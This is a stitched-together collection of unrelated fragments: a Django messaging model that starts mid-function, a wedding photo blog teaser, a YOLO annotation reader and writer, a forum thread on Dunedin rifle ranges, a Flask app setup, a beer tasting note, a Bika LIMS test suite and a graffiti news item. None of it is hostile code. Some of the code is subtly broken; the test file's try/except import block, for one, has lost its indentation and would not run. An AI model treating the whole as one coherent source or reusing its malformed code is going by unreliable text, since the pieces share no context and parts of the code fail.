        #(a dead `names = get_recipient_names(recipients)` call was removed -
        #the names are merged into senders_info by the call below)
        message.add_recipient_names_to_senders_info(recipients)
        message.save()
        message.add_recipients(recipients)
        message.send_email_alert()
        return message

    def create_response(self, sender=None, text=None, parent=None):
        """creates a response to ``parent`` and makes sure
        the parent's author is subscribed to the thread"""
        message = self.create(
            parent=parent,
            message_type=Message.STORED,
            sender=sender,
            text=text,
        )
        #recipients are parent's recipients + sender
        #creator of response gets memo in the "read" status
        recipients = set(parent.recipients.all())
        #add author of the parent as a recipient to parent
        if sender != parent.sender:
            senders_group = get_personal_group(parent.sender)
            parent.add_recipients([senders_group])
            recipients.add(senders_group)
        message.add_recipients(recipients)
        #update headline
        message.root.headline = text[:MAX_HEADLINE_LENGTH]
        #mark last active timestamp for the root message
        message.root.last_active_at = datetime.datetime.now()
        #update senders info - stuff that is shown in the thread heading
        #(update_senders_info() also saves the root message)
        message.root.update_senders_info()
        #unarchive the thread for all recipients
        message.root.unarchive()
        message.send_email_alert()
        return message
class Message(models.Model):
    """the message model allowing users to send
    messages to other users and groups, via
    personal groups.
    """
    #message is stored permanently, like email in an inbox
    STORED = 0
    #message is shown until ``active_until``
    TEMPORARY = 1
    #message is shown exactly once
    ONE_TIME = 2
    MESSAGE_TYPE_CHOICES = (
        (STORED, 'email-like message, stored in the inbox'),
        (ONE_TIME, 'will be shown just once'),
        (TEMPORARY, 'will be shown until certain time')
    )

    message_type = models.SmallIntegerField(
        choices=MESSAGE_TYPE_CHOICES,
        default=STORED,
    )

    sender = models.ForeignKey(User, related_name='group_messaging_sent_messages')

    #comma-separated list of a few names, shown in the thread heading
    senders_info = models.CharField(
        max_length=MAX_SENDERS_INFO_LENGTH,
        default=''
    )

    recipients = models.ManyToManyField(Group)

    #first message of the thread; None when this message is itself the root
    root = models.ForeignKey(
        'self', null=True,
        blank=True, related_name='descendants'
    )

    #message this one directly responds to
    parent = models.ForeignKey(
        'self', null=True,
        blank=True, related_name='children'
    )

    headline = models.CharField(max_length=MAX_HEADLINE_LENGTH)

    text = models.TextField(
        null=True, blank=True,
        help_text='source text for the message, e.g. in markdown format'
    )

    html = models.TextField(
        null=True, blank=True,
        help_text='rendered html of the message'
    )

    sent_at = models.DateTimeField(auto_now_add=True)
    last_active_at = models.DateTimeField(auto_now_add=True)
    active_until = models.DateTimeField(blank=True, null=True)

    objects = MessageManager()

    def add_recipient_names_to_senders_info(self, recipient_groups):
        """merges display names of the given recipient groups
        into the ``senders_info`` string"""
        names = get_recipient_names(recipient_groups)
        old_names = set(self.senders_info.split(','))
        names |= old_names
        self.senders_info = ','.join(names)

    def add_recipients(self, recipients):
        """adds recipients to the message
        and updates the sender lists for all recipients
        todo: sender lists may be updated in a lazy way - per user
        """
        self.recipients.add(*recipients)
        for recipient in recipients:
            sender_list, created = SenderList.objects.get_or_create(recipient=recipient)
            sender_list.senders.add(self.sender)

    def get_absolute_url(self, user=None):
        """returns absolute url to the thread,
        personalized for the given (required) user"""
        assert user is not None
        settings = django_settings.GROUP_MESSAGING
        #resolve the project-configured url getter function by dotted path
        func_path = settings['BASE_URL_GETTER_FUNCTION']
        path_bits = func_path.split('.')
        url_getter = getattr(
            import_module('.'.join(path_bits[:-1])),
            path_bits[-1]
        )
        params = copy.copy(settings['BASE_URL_PARAMS'])
        params['thread_id'] = self.id
        url = url_getter(user) + '?' + urllib.urlencode(params)
        #if include_domain_name: #don't need this b/c
        #    site = Site.objects.get_current()
        #    url = 'http://' + site.domain + url
        return url

    def get_email_subject_line(self):
        """forms subject line based on the root message
        and prepends 'Re': if message is non-root
        """
        subject = self.get_root_message().text[:MAX_SUBJECT_LINE_LENGTH]
        if self.root:
            subject = _('Re: ') + subject
        return subject

    def get_root_message(self):
        """returns root message or self
        if current message is root
        """
        return self.root or self

    def get_recipients_users(self):
        """returns query set of users belonging to the recipient
        groups, excluding the sender"""
        groups = self.recipients.all()
        return User.objects.filter(
            groups__in=groups
        ).exclude(
            id=self.sender.id
        ).distinct()

    def get_timeline(self):
        """returns ordered query set of messages in the thread
        with the newest first"""
        root = self.get_root_message()
        root_qs = Message.objects.filter(id=root.id)
        return (root.descendants.all() | root_qs).order_by('-sent_at')

    def send_email_alert(self):
        """emails an alert about this thread to each recipient,
        with a per-user link to the thread"""
        root_message = self.get_root_message()
        data = {'messages': self.get_timeline()}
        template = get_template('group_messaging/email_alert.html')
        body_text = template.render(data)
        subject = self.get_email_subject_line()
        for user in self.get_recipients_users():
            #todo change url scheme so that all users have the same
            #urls within their personal areas of the user profile
            #so that we don't need to have loops like this one
            thread_url = root_message.get_absolute_url(user)
            #NOTE(review): the original called thread_url.replace('&', '&'),
            #a no-op - it probably meant to escape '&' as '&amp;' for the
            #html template; confirm before adding escaping here
            #in the template we have a placeholder to be replaced like this:
            #(replace on a per-user copy - reassigning body_text consumed the
            #placeholder, so every recipient after the first got the first
            #recipient's url)
            user_body_text = body_text.replace('THREAD_URL_HOLE', thread_url)
            send_mail(
                subject,
                user_body_text,
                django_settings.DEFAULT_FROM_EMAIL,
                [user.email,],
            )

    def update_senders_info(self):
        """update the contributors info,
        meant to be used on a root message only
        """
        senders_names = self.senders_info.split(',')
        #move the latest sender to the front of the list
        if self.sender.username in senders_names:
            senders_names.remove(self.sender.username)
        senders_names.insert(0, self.sender.username)
        #truncate to the field length (named constant instead of magic 64)
        self.senders_info = (','.join(senders_names))[:MAX_SENDERS_INFO_LENGTH]
        self.save()

    def unarchive(self, user=None):
        """unarchive message for all recipients,
        or for just one user when given"""
        archived_filter = {'status': MessageMemo.ARCHIVED}
        if user:
            archived_filter['user'] = user
        memos = self.memos.filter(**archived_filter)
        memos.update(status=MessageMemo.SEEN)

    def set_status_for_user(self, status, user):
        """set specific status to the message for the user"""
        memo, created = MessageMemo.objects.get_or_create(user=user, message=self)
        memo.status = status
        memo.save()

    def archive(self, user):
        """mark message as archived"""
        self.set_status_for_user(MessageMemo.ARCHIVED, user)

    def mark_as_seen(self, user):
        """mark message as seen"""
        self.set_status_for_user(MessageMemo.SEEN, user)
|
I don’t normally do a teaser post for weddings on my blog, but I was too excited about this set of images we shot last week. Brynn and Chris had a vintage 50’s inspired wedding. We managed to “find” this old open barn in Langley, BC — the perfect location for their portraits. It seemed to have been empty for quite a while, so with every movement we made, the dust was stirred up and we got these amazing rays of light coming through the cracks in the walls! I’m not sure how I keep coming across all these barns for weddings around Vancouver, but they make for some good photos! Everything about their wedding was awesome, and they really put work into every little detail. I was lucky to be the one to capture it! Keep posted for more images from their day.
What amazing pictures! I can’t wait to see the rest!
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
import sys
import os
from xml.etree import ElementTree
from xml.etree.ElementTree import Element, SubElement
from lxml import etree
import codecs
from libs.constants import DEFAULT_ENCODING
#file extension for YOLO annotation output files
TXT_EXT = '.txt'
#text encoding used when writing annotation files (project-wide default)
ENCODE_METHOD = DEFAULT_ENCODING
class YOLOWriter:
    """Accumulates pixel-coordinate bounding boxes for one image and
    writes them out in YOLO text format: one
    ``class_index x_center y_center w h`` line per box, with all
    coordinates normalized to [0, 1]."""

    def __init__(self, folder_name, filename, img_size, database_src='Unknown', local_img_path=None):
        self.folder_name = folder_name
        self.filename = filename
        self.database_src = database_src
        #img_size is indexed as [0]=height, [1]=width (see the divisions below)
        self.img_size = img_size
        self.box_list = []
        self.local_img_path = local_img_path
        self.verified = False

    def add_bnd_box(self, x_min, y_min, x_max, y_max, name, difficult):
        """Queue one bounding box (pixel coordinates) for later saving."""
        bnd_box = {'xmin': x_min, 'ymin': y_min, 'xmax': x_max, 'ymax': y_max,
                   'name': name, 'difficult': difficult}
        self.box_list.append(bnd_box)

    def bnd_box_to_yolo_line(self, box, class_list=None):
        """Convert one box dict to the YOLO tuple
        (class_index, x_center, y_center, w, h), normalized by image
        width (img_size[1]) and height (img_size[0]).

        *class_list* is extended in place with unseen class names, so a
        caller-supplied list accumulates the label map across calls.
        """
        #a fresh list per call replaces the old shared mutable default
        #(`class_list=[]`), which leaked class names across calls/instances
        if class_list is None:
            class_list = []
        x_min = box['xmin']
        x_max = box['xmax']
        y_min = box['ymin']
        y_max = box['ymax']
        x_center = float((x_min + x_max)) / 2 / self.img_size[1]
        y_center = float((y_min + y_max)) / 2 / self.img_size[0]
        w = float((x_max - x_min)) / self.img_size[1]
        h = float((y_max - y_min)) / self.img_size[0]
        # PR387: register unseen labels on the fly
        box_name = box['name']
        if box_name not in class_list:
            class_list.append(box_name)
        class_index = class_list.index(box_name)
        return class_index, x_center, y_center, w, h

    def save(self, class_list=None, target_file=None):
        """Write the queued boxes to '<filename>.txt' (or *target_file*)
        and the accumulated label map to 'classes.txt' in the same
        directory."""
        if class_list is None:
            class_list = []
        if target_file is None:
            yolo_path = self.filename + TXT_EXT
        else:
            yolo_path = target_file
        classes_path = os.path.join(
            os.path.dirname(os.path.abspath(yolo_path)), "classes.txt")
        #context managers guarantee both handles are closed even on error
        with open(yolo_path, 'w', encoding=ENCODE_METHOD) as out_file, \
                open(classes_path, 'w') as out_class_file:
            for box in self.box_list:
                class_index, x_center, y_center, w, h = \
                    self.bnd_box_to_yolo_line(box, class_list)
                out_file.write("%d %.6f %.6f %.6f %.6f\n" % (class_index, x_center, y_center, w, h))
            for c in class_list:
                out_class_file.write(c + '\n')
class YoloReader:
    """Reads a YOLO-format annotation file back into pixel-coordinate
    shapes, using a 'classes.txt' label map and the image dimensions."""

    def __init__(self, file_path, image, class_list_path=None):
        # shapes type:
        # [label, [(x1,y1), (x2,y2), (x3,y3), (x4,y4)], color, color, difficult]
        self.shapes = []
        self.file_path = file_path
        if class_list_path is None:
            dir_path = os.path.dirname(os.path.realpath(self.file_path))
            self.class_list_path = os.path.join(dir_path, "classes.txt")
        else:
            self.class_list_path = class_list_path
        #close the class-map file promptly instead of leaking the handle
        with open(self.class_list_path, 'r') as classes_file:
            self.classes = classes_file.read().strip('\n').split('\n')
        #img_size is [height, width, depth]
        img_size = [image.height(), image.width(),
                    1 if image.isGrayscale() else 3]
        self.img_size = img_size
        self.verified = False
        self.parse_yolo_format()

    def get_shapes(self):
        """Return the parsed shapes list."""
        return self.shapes

    def add_shape(self, label, x_min, y_min, x_max, y_max, difficult):
        """Append one rectangle as its four corner points."""
        points = [(x_min, y_min), (x_max, y_min), (x_max, y_max), (x_min, y_max)]
        self.shapes.append((label, points, None, None, difficult))

    def yolo_line_to_shape(self, class_index, x_center, y_center, w, h):
        """Convert one normalized YOLO line back to a label and
        pixel-coordinate box, clamped to the image bounds."""
        label = self.classes[int(class_index)]
        x_min = max(float(x_center) - float(w) / 2, 0)
        x_max = min(float(x_center) + float(w) / 2, 1)
        y_min = max(float(y_center) - float(h) / 2, 0)
        y_max = min(float(y_center) + float(h) / 2, 1)
        x_min = round(self.img_size[1] * x_min)
        x_max = round(self.img_size[1] * x_max)
        y_min = round(self.img_size[0] * y_min)
        y_max = round(self.img_size[0] * y_max)
        return label, x_min, y_min, x_max, y_max

    def parse_yolo_format(self):
        """Read the annotation file line by line into ``self.shapes``."""
        #`with` closes the file instead of leaking the handle
        with open(self.file_path, 'r') as bnd_box_file:
            for bnd_box_line in bnd_box_file:
                class_index, x_center, y_center, w, h = bnd_box_line.strip().split(' ')
                label, x_min, y_min, x_max, y_max = self.yolo_line_to_shape(
                    class_index, x_center, y_center, w, h)
                # Caveat: difficult flag is discarded when saved as yolo format.
                self.add_shape(label, x_min, y_min, x_max, y_max, False)
|
Thread: Place to Sight in- Dunedin?
Hey does anyone have a heads up on where I could Sight in my Rifle in the Dunedin area?
Rifle ranges? a patch of Doc perhaps?
For just sighting in in Dunedin, the Leith Valley Rifle Range run by NZDA is most convenient.
Open 1pm - 4pm Saturdays, look at their facebook page for cancellations.
$10 fee for non members, $5 for NZDA members.
They have 25m, 50m and 100m target boards, use whichever you want. Bring own drawing pins. They'll supply you with A4 targets, or you can print and bring your own.
There is a black powder range towards Blueskin bay area, but no modern bottle neck cartridges allowed. Sunday mornings.
Alternately, Bruce Rifle Club, in Milton, range down same road you turn onto from SH1 if you are visiting the Otago Corrections Facility, they shoot some Sunday mornings. sometimes during the week, again on the internet. 100, 200, 400 and 600m ranges, but mostly 100 m range is used. You can't shoot 200m if the 100 m range is in use as you'd be shooting over the heads of the 100m users, and health and safety just won't allow such fun.
Micky Duck and Rees like this.
Legend — possibly missed my chance after reading the FB page! Bloody Christmas period!
will keep both those ranges in mind for future!
|
# coding: utf-8
import os
from flask_login import LoginManager
from flask_openid import OpenID
from config import basedir, ADMINS, MAIL_SERVER, MAIL_PORT, MAIL_USERNAME, MAIL_PASSWORD
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail
from momentjs import momentjs
from flask_babel import Babel, lazy_gettext
from flask.json import JSONEncoder
#application, database and extension setup
app = Flask(__name__)
app.config.from_object('config')
db = SQLAlchemy(app)

lm = LoginManager()
lm.init_app(app)
lm.login_view = 'login'
lm.login_message = lazy_gettext('请您先登陆。')

oid = OpenID(app, os.path.join(basedir, 'tmp'))
mail = Mail(app)
#single Babel instance - the original created a second, redundant
#`Babel(app)` after the logging setup; that duplicate was removed
babel = Babel(app)

if not app.debug:
    #log to a rotating file in production (10 files of 1 MB each)
    import logging
    from logging.handlers import RotatingFileHandler
    file_handler = RotatingFileHandler('tmp/microblog.log', 'a', 1 * 1024 * 1024, 10)
    file_handler.setLevel(logging.INFO)
    file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'))
    app.logger.addHandler(file_handler)
    app.logger.setLevel(logging.INFO)
    app.logger.info('microblog startup')

#expose the momentjs helper to all templates
app.jinja_env.globals['momentjs'] = momentjs
class CustomJSONEncoder(JSONEncoder):
    """JSON encoder that serializes lazy translation strings
    (speaklater / flask-babel) as plain strings instead of failing."""

    def default(self, obj):
        #imported lazily so the dependency is only needed when encoding
        from speaklater import is_lazy_string
        if is_lazy_string(obj):
            try:
                return unicode(obj)  # python 2
            except NameError:
                return str(obj)  # python 3
        return super(CustomJSONEncoder, self).default(obj)

#use the lazy-string-aware encoder for all jsonify() responses
app.json_encoder = CustomJSONEncoder
from app import views, models
|
Per's comments: Near black, small head. Fruity nose with syrup and licorice. Very sweet with full body and rounded mouthfeel. Heavy with syrup and caramel as well as coffee and licorice. Warming finish.
|
from bika.lims.content.analysis import Analysis
from bika.lims.testing import BIKA_FUNCTIONAL_TESTING
from bika.lims.tests.base import BikaFunctionalTestCase
from bika.lims.utils.analysisrequest import create_analysisrequest
from bika.lims.workflow import doActionFor
from plone.app.testing import login, logout
from plone.app.testing import TEST_USER_NAME
import unittest
try:
import unittest2 as unittest
except ImportError: # Python 2.7
import unittest
class TestHiddenAnalyses(BikaFunctionalTestCase):
    """Checks the 'Hidden' visibility setting of analysis services at each
    override level: service default -> profile/template -> analysis request.
    """
    layer = BIKA_FUNCTIONAL_TESTING

    def setUp(self):
        super(TestHiddenAnalyses, self).setUp()
        login(self.portal, TEST_USER_NAME)
        servs = self.portal.bika_setup.bika_analysisservices
        # analysis-service-3: Calcium (Ca)
        # analysis-service-6: Cooper (Cu)
        # analysis-service-7: Iron (Fe)
        self.services = [servs['analysisservice-3'],
                         servs['analysisservice-6'],
                         servs['analysisservice-7']]
        # Calcium - Hidden not set
        # Copper - Hidden set to False
        self.services[1].setHidden(False)
        # Iron - Hidden set to True
        self.services[2].setHidden(True)
        profs = self.portal.bika_setup.bika_analysisprofiles
        # analysisprofile-1: Trace Metals
        self.analysisprofile = profs['analysisprofile-1']
        artemp = self.portal.bika_setup.bika_artemplates
        # artemplate-2: Bruma Metals
        self.artemplate = artemp['artemplate-2']

    def tearDown(self):
        """Restore service, profile and template visibility defaults."""
        for s in self.services:
            s.setHidden(False)
        self.analysisprofile.setAnalysisServicesSettings([])
        self.artemplate.setAnalysisServicesSettings([])
        logout()
        super(TestHiddenAnalyses, self).tearDown()

    def test_service_hidden_service(self):
        """The Hidden flag can be toggled directly on the service."""
        service = self.services[1]
        self.assertFalse(service.getHidden())
        self.assertFalse(service.Schema().getField('Hidden').get(service))

        service.setHidden(False)
        self.assertFalse(service.getHidden())
        self.assertFalse(service.Schema().getField('Hidden').get(service))

        service.setHidden(True)
        self.assertTrue(service.getHidden())
        self.assertTrue(service.Schema().getField('Hidden').get(service))

        # Restore
        service.setHidden(False)

    def test_service_hidden_profile(self):
        """Profile-level overrides fall back to the service flag until an
        explicit setting is stored on the profile."""
        # Profile
        # For Calcium (unset)
        uid = self.services[0].UID()
        self.assertFalse(self.services[0].getHidden())
        self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))

        # For Copper (False)
        uid = self.services[1].UID()
        self.assertFalse(self.services[1].getHidden())
        self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))

        # For Iron (True)
        uid = self.services[2].UID()
        self.assertTrue(self.services[2].getHidden())
        self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))

        # Modify visibility for Calcium in profile
        uid = self.services[0].UID()
        sets = [{'uid': uid}]
        self.analysisprofile.setAnalysisServicesSettings(sets)
        self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))

        sets = [{'uid': uid, 'hidden': False}]
        self.analysisprofile.setAnalysisServicesSettings(sets)
        self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
        self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))

        sets = [{'uid': uid, 'hidden': True}]
        self.analysisprofile.setAnalysisServicesSettings(sets)
        self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
        self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))

        # Modify visibility for Cooper in profile
        uid = self.services[1].UID()
        sets = [{'uid': uid}]
        self.analysisprofile.setAnalysisServicesSettings(sets)
        self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))

        sets = [{'uid': uid, 'hidden': False}]
        self.analysisprofile.setAnalysisServicesSettings(sets)
        self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
        self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))

        sets = [{'uid': uid, 'hidden': True}]
        self.analysisprofile.setAnalysisServicesSettings(sets)
        self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
        self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))

        # Modify visibility for Iron in profile
        uid = self.services[2].UID()
        sets = [{'uid': uid}]
        self.analysisprofile.setAnalysisServicesSettings(sets)
        self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))

        sets = [{'uid': uid, 'hidden': False}]
        self.analysisprofile.setAnalysisServicesSettings(sets)
        self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
        self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))

        sets = [{'uid': uid, 'hidden': True}]
        self.analysisprofile.setAnalysisServicesSettings(sets)
        self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
        self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))

        # Restore
        self.analysisprofile.setAnalysisServicesSettings([])

    def test_service_hidden_artemplate(self):
        """Template-level overrides behave like the profile-level ones."""
        # Template
        # For Calcium (unset)
        uid = self.services[0].UID()
        self.assertFalse(self.services[0].getHidden())
        # fixed a copy-paste slip: the original asserted on
        # self.analysisprofile here, but the template is under test
        self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))

        # For Copper (False)
        uid = self.services[1].UID()
        self.assertFalse(self.services[1].getHidden())
        self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))

        # For Iron (True)
        uid = self.services[2].UID()
        self.assertTrue(self.services[2].getHidden())
        self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))

        # Modify visibility for Calcium in template
        uid = self.services[0].UID()
        sets = [{'uid': uid}]
        self.artemplate.setAnalysisServicesSettings(sets)
        self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))

        sets = [{'uid': uid, 'hidden': False}]
        self.artemplate.setAnalysisServicesSettings(sets)
        self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
        self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))

        sets = [{'uid': uid, 'hidden': True}]
        self.artemplate.setAnalysisServicesSettings(sets)
        self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
        self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))

        # Modify visibility for Cooper in template
        uid = self.services[1].UID()
        sets = [{'uid': uid}]
        self.artemplate.setAnalysisServicesSettings(sets)
        self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))

        sets = [{'uid': uid, 'hidden': False}]
        self.artemplate.setAnalysisServicesSettings(sets)
        self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
        self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))

        sets = [{'uid': uid, 'hidden': True}]
        self.artemplate.setAnalysisServicesSettings(sets)
        self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
        self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))

        # Modify visibility for Iron in template
        uid = self.services[2].UID()
        sets = [{'uid': uid}]
        self.artemplate.setAnalysisServicesSettings(sets)
        self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))

        sets = [{'uid': uid, 'hidden': False}]
        self.artemplate.setAnalysisServicesSettings(sets)
        self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
        self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))

        sets = [{'uid': uid, 'hidden': True}]
        self.artemplate.setAnalysisServicesSettings(sets)
        self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
        self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))

        # Restore
        self.artemplate.setAnalysisServicesSettings([])

    def test_service_hidden_analysisrequest(self):
        """AR-level overrides, alone and combined with profile/template."""
        # Input results
        # Client: Happy Hills
        # SampleType: Apple Pulp
        # Contact: Rita Mohale
        # Analyses: [Calcium, Copper, Iron]
        client = self.portal.clients['client-1']
        sampletype = self.portal.bika_setup.bika_sampletypes['sampletype-1']
        request = {}
        services = [s.UID() for s in self.services]
        values = {'Client': client.UID(),
                  'Contact': client.getContacts()[0].UID(),
                  'SamplingDate': '2015-01-01',
                  'SampleType': sampletype.UID()}
        ar = create_analysisrequest(client, request, values, services)
        self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[0]))
        self.assertFalse(ar.isAnalysisServiceHidden(services[0]))
        self.assertFalse(ar.getAnalysisServiceSettings(services[1]).get('hidden'))
        self.assertFalse(ar.isAnalysisServiceHidden(services[1]))
        self.assertFalse(ar.getAnalysisServiceSettings(services[2]).get('hidden'))
        self.assertTrue(ar.isAnalysisServiceHidden(services[2]))

        # For Calcium (unset)
        uid = self.services[0].UID()
        self.assertFalse(self.services[0].getHidden())
        # fixed a copy-paste slip: the original asserted on
        # self.analysisprofile / self.artemplate here, but the AR is under test
        self.assertFalse(ar.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))

        # For Copper (False)
        uid = self.services[1].UID()
        self.assertFalse(self.services[1].getHidden())
        self.assertFalse(ar.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))

        # For Iron (True)
        uid = self.services[2].UID()
        self.assertTrue(self.services[2].getHidden())
        self.assertTrue(ar.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))

        # Modify visibility for Calcium in AR
        uid = self.services[0].UID()
        sets = [{'uid': uid}]
        ar.setAnalysisServicesSettings(sets)
        self.assertFalse(ar.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))

        sets = [{'uid': uid, 'hidden': False}]
        ar.setAnalysisServicesSettings(sets)
        self.assertFalse(ar.isAnalysisServiceHidden(uid))
        self.assertTrue('hidden' in ar.getAnalysisServiceSettings(uid))

        sets = [{'uid': uid, 'hidden': True}]
        ar.setAnalysisServicesSettings(sets)
        self.assertTrue(ar.isAnalysisServiceHidden(uid))
        self.assertTrue('hidden' in ar.getAnalysisServiceSettings(uid))
        ar.setAnalysisServicesSettings([])

        # AR with profile with no changes
        values['Profiles'] = self.analysisprofile.UID()
        ar = create_analysisrequest(client, request, values, services)
        self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[0]))
        self.assertFalse(ar.getAnalysisServiceSettings(services[1]).get('hidden'))
        self.assertFalse(ar.getAnalysisServiceSettings(services[2]).get('hidden'))

        uid = self.services[0].UID()
        self.assertFalse(self.services[0].getHidden())
        self.assertFalse(ar.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))

        uid = self.services[1].UID()
        self.assertFalse(self.services[1].getHidden())
        self.assertFalse(ar.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))

        uid = self.services[2].UID()
        self.assertTrue(self.services[2].getHidden())
        self.assertTrue(ar.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))

        # AR with template with no changes
        values['Template'] = self.artemplate
        del values['Profiles']
        ar = create_analysisrequest(client, request, values, services)
        self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[0]))
        self.assertFalse(ar.getAnalysisServiceSettings(services[1]).get('hidden'))
        self.assertFalse(ar.getAnalysisServiceSettings(services[2]).get('hidden'))

        uid = self.services[0].UID()
        self.assertFalse(self.services[0].getHidden())
        self.assertFalse(ar.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))

        uid = self.services[1].UID()
        self.assertFalse(self.services[1].getHidden())
        self.assertFalse(ar.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))

        uid = self.services[2].UID()
        self.assertTrue(self.services[2].getHidden())
        self.assertTrue(ar.isAnalysisServiceHidden(uid))
        self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))

        # AR with profile, with changes
        # matrix rows: service Hidden = not set / False / True
        # matrix cols: profile setting hidden=False / hidden=True / unset
        # cell: 1 = expect hidden, 2 = expect visible;
        #       negative = no 'hidden' key expected in the AR settings
        values['Profiles'] = self.analysisprofile.UID()
        del values['Template']
        matrix = [[2, 1, -2],  # AS = Not set
                  [2, 1, -2],  # AS = False
                  [2, 1, -1]]  # AS = True
        for i in range(len(matrix)):
            sets = {'uid': services[i]}
            opts = [0, 1, 2]
            for j in opts:
                if j == 0:
                    sets['hidden'] = False
                elif j == 1:
                    sets['hidden'] = True
                else:
                    del sets['hidden']
                self.analysisprofile.setAnalysisServicesSettings(sets)
                ar = create_analysisrequest(client, request, values, services)
                res = matrix[i][j]
                if res < 0:
                    self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[i]))
                else:
                    self.assertTrue('hidden' in ar.getAnalysisServiceSettings(services[i]))
                if abs(res) == 1:
                    self.assertTrue(ar.isAnalysisServiceHidden(services[i]))
                elif abs(res) == 2:
                    self.assertFalse(ar.isAnalysisServiceHidden(services[i]))

        # Restore
        self.analysisprofile.setAnalysisServicesSettings([])

        # AR with template, with changes (same matrix semantics as above)
        values['Template'] = self.artemplate.UID()
        del values['Profiles']
        matrix = [[2, 1, -2],  # AS = Not set
                  [2, 1, -2],  # AS = False
                  [2, 1, -1]]  # AS = True
        for i in range(len(matrix)):
            sets = {'uid': services[i]}
            opts = [0, 1, 2]
            for j in opts:
                if j == 0:
                    sets['hidden'] = False
                elif j == 1:
                    sets['hidden'] = True
                else:
                    del sets['hidden']
                self.artemplate.setAnalysisServicesSettings(sets)
                ar = create_analysisrequest(client, request, values, services)
                res = matrix[i][j]
                if res < 0:
                    self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[i]))
                else:
                    self.assertTrue('hidden' in ar.getAnalysisServiceSettings(services[i]))
                if abs(res) == 1:
                    self.assertTrue(ar.isAnalysisServiceHidden(services[i]))
                elif abs(res) == 2:
                    self.assertFalse(ar.isAnalysisServiceHidden(services[i]))

        # Restore
        self.artemplate.setAnalysisServicesSettings([])
def test_suite():
    """Build and return the functional test suite for the hidden-analyses tests."""
    ts = unittest.TestSuite()
    ts.addTest(unittest.makeSuite(TestHiddenAnalyses))
    # Attach the functional testing layer so the Plone test runner sets up
    # the sandbox before these tests execute.
    ts.layer = BIKA_FUNCTIONAL_TESTING
    return ts
|
Toronto based graffiti artist Kwest recently made his way out to the Belle Province to paint a massive new piece on the streets of Montreal. With no projectors or assistants, the piece took 30 cans and 10 gallons of bucket paint and was done in just 30 hours.
